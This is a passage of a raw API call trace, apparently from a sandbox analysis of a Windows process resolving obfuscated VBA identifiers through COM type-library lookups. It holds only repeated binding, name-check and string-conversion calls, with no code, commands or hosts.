0x0 [0069.333] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.333] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.333] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lZ1DA_AU", lHashVal=0x10523b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.333] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.334] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.334] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lZ1DA_AU", lHashVal=0x10523b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.334] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.334] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.334] IUnknown:Release (This=0x665ba50) returned 0xd [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1244e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_lZ1DA_AU") returned 16 [0069.334] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lZ1DA_AU", lHashVal=0x10523b, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.334] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8049e | out: _Dst=0x144ec0) returned 0x0 [0069.334] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NXADUQQ", lHashVal=0x1080f4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b804ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXADUQQ") returned 8 [0069.334] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NXADUQQ", lHashVal=0x1080f4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b804ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXADUQQ") returned 8 [0069.334] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NXADUQQ", lHashVal=0x1080f4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.334] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NXADUQQ") returned 0x1080f4 [0069.334] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="NXADUQQ" | out: _Dst="NXADUQQ") returned 0x0 [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="NXADUQQ") returned 8 [0069.334] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.334] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NXADUQQ", lHashVal=0x1080f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.334] IUnknown:Release (This=0x665ba50) returned 0xd [0069.334] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.334] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NXADUQQ", lHashVal=0x1080f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.335] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.335] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.335] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NXADUQQ", lHashVal=0x1080f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.335] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.335] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.335] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NXADUQQ", lHashVal=0x1080f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.335] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b804ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXADUQQ") returned 8 [0069.335] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NXADUQQ", lHashVal=0x1080f4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.335] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.335] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b804ca | out: _Dst=0x67c2d40) returned 0x0 [0069.335] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NXADUQQ") returned 0x1074f7 [0069.335] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_NXADUQQ" | out: _Dst="_B_var_NXADUQQ") returned 0x0 [0069.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_NXADUQQ") returned 15 [0069.335] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.335] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NXADUQQ", lHashVal=0x1074f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.335] IUnknown:Release (This=0x665ba50) returned 0xd [0069.335] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.335] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NXADUQQ", lHashVal=0x1074f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.335] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.335] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.335] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NXADUQQ", lHashVal=0x1074f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.335] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.335] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.335] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NXADUQQ", lHashVal=0x1074f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.335] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.335] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.336] IUnknown:Release (This=0x665ba50) returned 0xd [0069.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1247e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_NXADUQQ") returned 15 [0069.336] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NXADUQQ", lHashVal=0x1074f7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x55004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x55004400000000, pDummy=0x0) returned 0x0 [0069.336] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b804ca | out: _Dst=0x144ec0) returned 0x0 [0069.336] ITypeComp:RemoteBind (in: This=0x665ba60, szName="X_ZAXZ", lHashVal=0x10caf8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b804f2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="X_ZAXZ") returned 7 [0069.336] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="X_ZAXZ", lHashVal=0x10caf8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b804f2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="X_ZAXZ") returned 7 [0069.336] ITypeComp:RemoteBind (in: This=0x665bd30, szName="X_ZAXZ", lHashVal=0x10caf8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.336] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="X_ZAXZ") returned 0x10caf8 [0069.336] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="X_ZAXZ" | out: _Dst="X_ZAXZ") returned 0x0 [0069.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="X_ZAXZ") returned 7 [0069.336] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.336] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="X_ZAXZ", lHashVal=0x10caf8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.336] IUnknown:Release (This=0x665ba50) returned 0xd [0069.336] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.336] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="X_ZAXZ", lHashVal=0x10caf8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.336] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.336] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.336] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="X_ZAXZ", lHashVal=0x10caf8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.336] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.337] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.337] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="X_ZAXZ", lHashVal=0x10caf8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.337] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b804f2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="X_ZAXZ") returned 7 [0069.337] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="X_ZAXZ", lHashVal=0x10caf8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.337] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.337] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b804f2 | out: _Dst=0x67c2d40) returned 0x0 [0069.337] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_X_ZAXZ") returned 0x104562 [0069.337] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_X_ZAXZ" | out: _Dst="_B_var_X_ZAXZ") returned 0x0 [0069.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_X_ZAXZ") returned 14 [0069.337] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.337] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_X_ZAXZ", lHashVal=0x104562, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.337] IUnknown:Release (This=0x665ba50) returned 0xd [0069.337] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.337] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_X_ZAXZ", lHashVal=0x104562, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.337] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.337] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.337] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_X_ZAXZ", lHashVal=0x104562, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.337] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.337] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.337] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_X_ZAXZ", lHashVal=0x104562, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.337] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.337] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.337] IUnknown:Release (This=0x665ba50) returned 0xd [0069.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b124ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_X_ZAXZ") returned 14 [0069.337] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_X_ZAXZ", lHashVal=0x104562, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0) returned 0x0 [0069.338] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b804f2 | out: _Dst=0x144ec0) returned 0x0 [0069.338] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iGAGAo1D", lHashVal=0x10ad17, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80542, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iGAGAo1D") returned 9 [0069.338] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iGAGAo1D", lHashVal=0x10ad17, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80542, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iGAGAo1D") returned 9 [0069.338] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iGAGAo1D", lHashVal=0x10ad17, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.338] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iGAGAo1D") returned 0x10ad17 [0069.338] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="iGAGAo1D" | out: _Dst="iGAGAo1D") returned 0x0 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="iGAGAo1D") returned 9 [0069.338] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.338] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iGAGAo1D", lHashVal=0x10ad17, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.338] IUnknown:Release (This=0x665ba50) returned 0xd [0069.338] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.338] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iGAGAo1D", lHashVal=0x10ad17, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.338] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.338] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.338] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iGAGAo1D", lHashVal=0x10ad17, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.338] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.338] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.338] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iGAGAo1D", lHashVal=0x10ad17, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.339] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80542, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iGAGAo1D") returned 9 [0069.339] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iGAGAo1D", lHashVal=0x10ad17, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.339] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.339] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80542 | out: _Dst=0x67c2d40) returned 0x0 [0069.339] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iGAGAo1D") returned 0x1084a0 [0069.339] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_iGAGAo1D" | out: _Dst="_B_var_iGAGAo1D") returned 0x0 [0069.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_iGAGAo1D") returned 16 [0069.339] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.339] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iGAGAo1D", lHashVal=0x1084a0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.339] IUnknown:Release (This=0x665ba50) returned 0xd [0069.339] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.339] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iGAGAo1D", lHashVal=0x1084a0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.339] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.339] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.339] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iGAGAo1D", lHashVal=0x1084a0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.339] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.339] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.339] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iGAGAo1D", lHashVal=0x1084a0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.339] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.339] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.339] IUnknown:Release (This=0x665ba50) returned 0xd [0069.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b124de, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_iGAGAo1D") returned 16 [0069.339] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iGAGAo1D", lHashVal=0x1084a0, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0069.340] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80542 | out: _Dst=0x144ec0) returned 0x0 [0069.340] ITypeComp:RemoteBind (in: This=0x665ba60, szName="W4xQCX", lHashVal=0x10e28e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8051a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="W4xQCX") returned 7 [0069.340] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="W4xQCX", lHashVal=0x10e28e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8051a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="W4xQCX") returned 7 [0069.340] ITypeComp:RemoteBind (in: This=0x665bd30, szName="W4xQCX", lHashVal=0x10e28e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.340] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W4xQCX") returned 0x10e28e [0069.340] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="W4xQCX" | out: _Dst="W4xQCX") returned 0x0 [0069.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="W4xQCX") returned 7 [0069.340] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.340] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="W4xQCX", lHashVal=0x10e28e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.340] IUnknown:Release (This=0x665ba50) returned 0xd [0069.340] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.340] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="W4xQCX", lHashVal=0x10e28e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.340] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.340] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.340] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="W4xQCX", lHashVal=0x10e28e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.340] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.340] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.340] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="W4xQCX", lHashVal=0x10e28e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.340] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8051a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="W4xQCX") returned 7 [0069.341] ITypeComp:RemoteBind (in: This=0x665b4c0, 